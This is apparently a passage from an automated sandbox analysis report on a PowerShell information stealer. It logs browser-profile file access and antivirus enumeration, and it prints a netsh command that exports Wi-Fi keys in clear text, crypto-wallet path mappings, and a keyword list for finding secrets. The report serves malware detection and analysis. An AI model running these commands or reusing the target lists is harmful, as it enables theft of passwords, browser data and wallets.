      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\W5GO0CYE VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\LocalState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\SystemAppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\INetHistory\BackgroundTransferApiGroup VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\202914 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\202914 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\280811 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\353698 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\88000161 VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\LocalState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\Settings VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetCookies VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\AC\Temp VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\SystemAppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ParentalControls_cw5n1h2txyewy\TempState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AC\INetHistory VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\AppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\RoamingState VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\SystemAppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AC\INetCache VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\SystemAppData VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Uses netsh to modify the Windows network and firewall settings
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\user~1\AppData\Local\Temp\wifi key=clear
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

      barindex
      Found many strings related to Crypto-Wallets (likely being stolen)
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "Electrum" = Join-Path $env:appdata "\Electrum\wallets"
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "com.liberty.jaxx" = Join-Path $env:appdata "\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb"
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "Exodus" = Join-Path $env:appdata "\Exodus\exodus.wallet"
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "Ethereum" = Join-Path $env:appdata "\Ethereum\keystore"
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B31E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 2fa|account|auth|backup|bank|binance|bitcoin|bitwarden|btc|casino|code|coinbase |crypto|dashlane|discord|eth|exodus|facebook|funds|info|keepass|keys|kraken|kucoin|lastpass|ledger|login|mail|memo|metamask|mnemonic|nordpass|note|pass|passphrase|paypal|pgp|private|pw|recovery|remote|roboform|secret|seedphrase|server|skrill|smtp|solana|syncthing|tether|token|trading|trezor|venmo|vault|wallet
      Source: powershell.exe, 00000019.00000002.2548122352.00000236B1AD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "Ethereum" = Join-Path $env:appdata "\Ethereum\keystore"
      Source: powershell.exe, 0000000C.00000002.1369722777.00007FFAAC7F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
